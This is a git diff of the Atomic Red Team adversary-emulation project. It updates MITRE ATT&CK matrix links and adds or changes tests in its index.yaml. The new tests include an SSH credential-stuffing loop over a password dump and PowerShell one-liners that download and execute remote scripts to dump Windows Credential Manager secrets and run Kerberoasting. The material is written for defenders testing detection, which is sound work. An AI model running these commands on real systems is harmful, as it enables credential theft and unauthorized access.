 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  |  |  |
-|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
+|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) |  |  |  |  |  |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  |  |  |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -76,10 +76,10 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 2448302b..5cb56258 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -5,7 +5,7 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -15,12 +15,12 @@
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) |  | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) |  | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -57,7 +57,7 @@
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 35161db6..7160e201 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -831,7 +831,72 @@ credential-access:
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
-    atomic_tests: []
+      identifier: T1110.004
+    atomic_tests:
+    - name: SSH Credential Stuffing From Linux
+      auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
+          [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
+          apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
+
+'
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
+    - name: SSH Credential Stuffing From MacOS
+      auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
+      description: 'Using username,password combination from a password dump to login
+        over SSH.
+
+'
+      supported_platforms:
+      - macos
+      input_arguments:
+        target_host:
+          description: IP Address / Hostname you want to target.
+          type: String
+          default: localhost
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Requires SSHPASS
+
+'
+        prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+          brew install hudochenkov/sshpass/sshpass
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
+          for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
   T1552.001:
     technique:
       id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
@@ -1048,13 +1113,40 @@ credential-access:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
         cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
           Ignore
 
 '
         name: powershell
+    - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+        Credentials]
+      auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+          -UseBasicParsing); Get-PasswordVaultCredentials -Force   \n"
+    - name: Dump credentials from Windows Credential Manager With PowerShell [web
+        Credentials]
+      auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+      description: This module will extract the credentials from Windows Credential
+        Manager
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+          -UseBasicParsing); Get-CredManCreds -Force
+
+'
   T1555.003:
     technique:
       created: '2020-02-12T18:57:36.041Z'
@@ -2247,6 +2339,7 @@ credential-access:
       - windows
       executor:
         command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
           Invoke-Kerberoast | fl
         name: powershell
@@ -2760,6 +2853,7 @@ credential-access:
 '
         get_prereq_command: |
           $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
           if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
             Expand-Archive $zippath $parentpath\wce -Force
@@ -2801,6 +2895,7 @@ credential-access:
 
 '
         get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
